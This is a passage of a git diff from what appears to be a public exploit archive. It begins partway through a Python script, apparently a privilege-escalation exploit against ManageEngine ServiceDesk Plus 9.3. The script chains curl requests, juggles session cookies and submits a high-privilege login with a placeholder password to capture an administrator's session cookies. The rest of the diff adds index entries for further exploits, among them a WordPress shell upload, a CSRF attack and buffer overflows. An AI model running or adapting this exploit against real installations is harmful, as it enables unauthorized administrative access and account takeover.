$'"+url+"/mc/jsp/MCLogOut.jsp'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +print("\033[1;31mDoing the magic step 2.\033[1;37m") + + + + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/jsp/MCDashboard.jsp'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] + + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/'" + +out = os.popen('/bin/bash -c "' + curl+'"').read() +sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] + + +curl = "curl -i -s -k -X $'POST' \ + -H $'"+host+"' \ + -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ + -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \ + $'"+url+"/mc/j_security_check'" + + +out = os.popen('/bin/bash -c "' + curl+'"').read() + +curl = "curl -i -s -k -X $'GET' \ + -H $'Host: "+host+"' \ + -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ + -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + -H $'Upgrade-Insecure-Requests: 1' \ + -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ + $'"+url+"/mc/jsp/MCDashboard.jsp'" + + + +out = os.popen('/bin/bash -c "' + curl+'"').read() + + +sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] +sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] + +print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m") +print("JSESSIONID=" + sessidhigh) +print("JSESSIONIDSSO=" + sessidssohigh) +print(grbl2[0] + "=" + grbl2[1]) +print(grbl2[2] + "=" + grbl2[3]) +print("_rem=true") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1ad07bb73..de42aaea4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10396,6 +10396,7 @@ id,file,description,date,author,type,platform,port 46625,exploits/windows/local/46625.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)",2019-03-28,"Paolo Perego",local,windows, 46636,exploits/windows/local/46636.py,"AIDA64 Extreme / Engineer / Network Audit 5.99.4900 - SEH Buffer Overflow (EggHunter)",2019-04-02,"Peyman Forouzan",local,windows, 46657,exploits/windows/local/46657.py,"AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow (SEH)",2019-04-04,"Anurag Srivastava",local,windows, +46660,exploits/windows/local/46660.py,"AIDA64 Extreme 5.99.4900 - 'Logging' SEH Buffer Overflow",2019-04-05,"Peyman Forouzan",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17297,6 +17298,7 @@ id,file,description,date,author,type,platform,port 46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution",2019-04-03,"Metin Yunus Kandemir",remote,python,80 46654,exploits/multiple/remote/46654.html,"Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion",2019-04-03,"Google Security Research",remote,multiple, 46655,exploits/hardware/remote/46655.rb,"Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)",2019-04-03,Metasploit,remote,hardware, +46662,exploits/php/remote/46662.rb,"WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)",2019-04-05,Metasploit,remote,php,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41098,3 +41100,5 @@ id,file,description,date,author,type,platform,port 46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80 46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80 46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80 +46659,exploits/windows/webapps/46659.py,"Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,windows, +46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php,